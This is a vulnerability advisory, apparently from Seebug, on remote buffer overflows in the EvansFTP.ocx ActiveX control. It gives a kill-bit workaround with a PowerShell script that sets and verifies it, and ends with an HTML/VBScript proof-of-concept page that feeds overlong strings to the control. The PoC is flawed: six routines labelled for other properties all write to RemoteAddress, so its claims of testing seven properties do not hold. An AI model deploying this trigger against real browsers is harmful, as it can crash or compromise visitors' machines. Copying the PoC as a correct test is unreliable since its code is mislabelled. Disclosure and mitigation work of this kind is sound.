Evans FTP EvansFTP.ocx ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities

2008-12-19T00:00:00
ID SSV:4571
Type seebug
Reporter Root
Modified 2008-12-19T00:00:00

Description

BUGTRAQ ID: 32814

Evans FTP is an FTP programming solution delivered as an ActiveX FTP control.

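The EvansFTP.ocx ActiveX control does not properly validate the arguments passed to the RemoteAddress, ProxyPrefix, ProxyName, Password, ProxyBypassList, LoginName and CurrentDirectory properties. If a user is tricked into visiting a malicious web page that passes an overly long string to any of these properties, a buffer overflow can be triggered, leading to arbitrary code execution.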

Evans Programming Evans FTP temporary workaround:

  • Set the kill bit for CLSID {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}.
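
One way to apply and verify this workaround from an elevated PowerShell prompt. This is an added example, not part of the original advisory; it assumes the standard Internet Explorer kill-bit mechanism (a `Compatibility Flags` DWORD with bit 0x400 under `ActiveX Compatibility`), and the function name `Set-KillBit` is illustrative.

```powershell
# Added example: set and verify the IE kill bit for the EvansFTP.ocx CLSID.
# Requires an elevated (administrator) PowerShell session.
$Clsid   = '{7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}'  # CLSID given in the advisory
$KillBit = 0x400                                      # kill-bit flag in "Compatibility Flags"
$Value   = 'Compatibility Flags'

# Native registry view, plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-KillBit {
    param([string]$Root, [string]$Clsid)

    $key = "$Root\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Keep any flags already stored for this CLSID and OR in the kill bit.
    $existing = Get-ItemProperty -LiteralPath $key -Name $Value -ErrorAction SilentlyContinue
    $current  = if ($existing) { [int]$existing.$Value } else { 0 }
    $new      = $current -bor $KillBit

    New-ItemProperty -LiteralPath $key -Name $Value -PropertyType DWord `
        -Value $new -Force | Out-Null
}

foreach ($root in $Roots) {
    # The WOW6432Node view does not exist on 32-bit Windows; skip missing roots.
    if (-not (Test-Path -LiteralPath $root)) {
        Write-Host "skip (not present): $root"
        continue
    }

    Set-KillBit -Root $root -Clsid $Clsid

    # Read the value back and confirm the kill bit is set.
    $flags = (Get-ItemProperty -LiteralPath "$root\$Clsid" -Name $Value).$Value
    $state = if (($flags -band $KillBit) -ne 0) { 'kill bit SET' } else { 'kill bit NOT set' }
    Write-Host ('{0}: flags=0x{1:X8} ({2})' -f $root, $flags, $state)
}
```

Restart Internet Explorer afterwards so the control is no longer instantiated in new browser sessions.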

Vendor patch:

Evans Programming

The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.evansprogramming.com/evansftp.asp

<HTML>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' />
<HEAD>
  <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE>
</HEAD>
<BODY>

</pre>
<script language='vbscript'>
Sub RemoteAddress
arg1=String(2068, "A")
beard.RemoteAddress = arg1
End Sub

Sub ProxyPrefix
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub

Sub ProxyName
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub

Sub Password
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub

Sub ProxyBypassList
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub

Sub LoginName
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub

Sub CurrentDirectory
arg1=String(1044, "A")
beard.RemoteAddress = arg1
End Sub
</script><br><br>

<INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()>
<INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()>
<INPUT TYPE="button" VALUE="ProxyName  PoC" ONCLICK=ProxyName()>
<INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()>
<INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()>
<INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()>
<INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br>

</BODY>
</HTML>